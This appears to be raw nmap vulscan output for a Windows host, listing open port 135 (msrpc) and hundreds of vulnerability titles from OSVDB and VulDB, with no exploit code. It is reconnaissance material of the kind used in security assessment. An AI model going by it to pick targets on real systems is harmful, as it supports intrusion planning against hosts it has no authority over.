Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [7117] Microsoft Windows RPC Locator Remote Overflow [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [5179] Microsoft Windows 2000 microsoft-ds DoS [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2670] Microsoft Windows RPC Race Condition DoS [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1819] Windows 2000 Kerberos LSA Memory Leak/DoS [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account
135	tcp	open	msrpc	syn-ack	Microsoft Windows RPC
	vulscan	VulDB - https://vuldb.com: [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [88280] Microsoft Windows DCE/RPC information disclosure [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [54547] Microsoft Windows grpconv.exe memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC LSASS.EXE privilege escalation [13856] Microsoft Windows NT 4.0 RPC Locator rpcss.exe denial of service [9942] Microsoft Windows up to XP Asynchronous RPC Request privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4181] Microsoft Windows RPC Processor privilege escalation [3370] Microsoft Windows RPC Authentication denial of service [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2310] Microsoft Windows 2000 RPC weak authentication [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [900] Microsoft Windows grpconv.exe memory corruption [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [331] Microsoft Windows 2000/XP RPCSS race condition [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft 